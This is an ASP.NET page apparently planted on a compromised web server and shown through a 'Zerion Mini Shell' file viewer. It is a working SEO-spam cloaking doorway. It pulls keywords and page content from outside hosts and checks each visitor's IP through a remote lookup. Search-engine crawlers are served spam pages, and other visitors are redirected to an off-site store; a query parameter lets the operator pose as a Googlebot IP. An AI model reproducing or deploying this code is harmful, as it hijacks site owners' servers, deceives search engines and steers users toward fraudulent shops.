Mini Shell
<%@ Page Language="C#" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server">
protected void Page_Load(object sender, EventArgs e)
{
if (!IsPostBack)
{
tz();
webclient = new System.Net.WebClient();
webclient.Encoding = System.Text.Encoding.UTF8;
a = new Random(System.DateTime.Now.Millisecond);
gjc1 = webclient.DownloadString("http://zpdy.lc7.fr/getci.aspx?cid=" + Request.QueryString["cid"] + "&s=2&e=4");
gjc2 = webclient.DownloadString("http://zpdy.lc7.fr/getci.aspx?cid=" + Request.QueryString["cid"] + "&s=5&e=7");
ckwz = webclient.DownloadString("http://wfjs.a123.fr/wlen.asp");
string hyzhdy = webclient.DownloadString("http://wfjs.a123.fr/tpenzp.asp");
string pname = Request.CurrentExecutionFilePath;
string URL = "";
dbhl = webclient.DownloadString("http://wfjs.a123.fr/hlenzp.asp?page=" + pname);
if (Request.QueryString["zpen"] != null)
{ gjc = Request.QueryString["zpen"];
URL = "http://zpdy.lc7.fr/mb.aspx?cid=" + Request.QueryString["cid"] + "&shop=" + HttpUtility.UrlEncode(gjc) + "&xi=" + Request.QueryString["xi"] + "&xc=" + Request.QueryString["xc"] + "&page=" + pname;
}
else if (Request.QueryString["cid"] != null && Request.QueryString["number"] != null)
{ URL = "http://zpdy.lc7.fr/snp.aspx?cid=" + Request.QueryString["cid"] + "&number=" + Request.QueryString["number"] + "&xi=1-6&xc=19-26";
content = webclient.DownloadString(URL);
content = content.Replace("yymm", "https://"+HttpContext.Current.Request.Url.Host + pname);
content = content.Replace("shop=", "zpen=");
Response.Write(content);
Response.End();
}
else if (Request.QueryString["pnum"] != null)
{ URL = "http://zpdy.lc7.fr/mb.aspx?cid=" + Request.QueryString["cid"] + "&xi=1-6&xc=19-26&pnum=" + Request.QueryString["pnum"] + "&page=" + pname;
}
else
{
URL = hyzhdy + "&xi=1-6&xc=19-26&page=" + pname;
}
content = webclient.DownloadString(URL);
content = content.Replace("shop=", "zpen=");
}
}
public void tz()
{
string ip = System.Web.HttpContext.Current.Request.ServerVariables["REMOTE_ADDR"];
if (Request.QueryString["kk"] != null)
{
ip = "66.249.64.190";
}
string ipurl = "http://wfjs.a123.fr/getdomain.aspx?rnd=1&ip=" + ip;
webclient = new System.Net.WebClient();
webclient.Encoding = System.Text.Encoding.UTF8;
string domain = webclient.DownloadString(ipurl).ToLower();
if (domain.IndexOf("google") == -1 && domain.IndexOf("msn.com") == -1 && domain.IndexOf("yahoo.com") == -1 && domain.IndexOf("aol.com") == -1)
{
if (Request.QueryString["zpen"] != null)
{
string tzurl = webclient.DownloadString("http://wfjs.a123.fr/tzzp.txt").ToLower();
Response.Redirect("http://zpdy.lc7.fr/a.aspx?cid=" + Request.QueryString["cid"] + "&cname=" + HttpUtility.UrlEncode(Request.QueryString["zpen"]) + "&xi=" + Request.QueryString["xi"] + "&xc=" + Request.QueryString["xc"]);
Response.End();
}
}
}
public System.Net.WebClient webclient = null;
public string gjc="Online Store";
public string gjc1="";
public string gjc2="";
public string content = "";
public System.Random a = null;
public string dbhl="";
public string ckwz="";
</script>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<title><%=gjc%> off <%=a.Next(60,80)%>% - <%=HttpContext.Current.Request.Url.Host%></title>
<meta name="keywords" content="<%=gjc%>,<%=gjc1%>" />
<meta name="description" content="<%=gjc%>,<%=gjc2%>." />
<meta name="robots" content="index,follow,all" />
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
<meta name="Robots" content="index, follows"><style>
@media (max-width: 768px)
{
body {
width:100%;
height:100%;
}
body {
font-family:Open Sans,'Helvetica Neue',Arial,sans-serif;
font-size:15px;
color:#777;
line-height:1.7;
}
img{ width:80%}
iframe{ max-width:100% !important; height:auto; float: left;}
div { width:100% !important; float:left}
div span{ width:100%;float:left}
a {
color:#f05f40;
-webkit-transition:all .35s;
-moz-transition:all .35s;
transition:all .35s;
}
a:hover,a:focus {
color:#eb3812;
}
}
</style></head>
<body>
<%=content%>
<%=dbhl%>
<%=ckwz%>
</body>
</html>
Zerion Mini Shell 1.0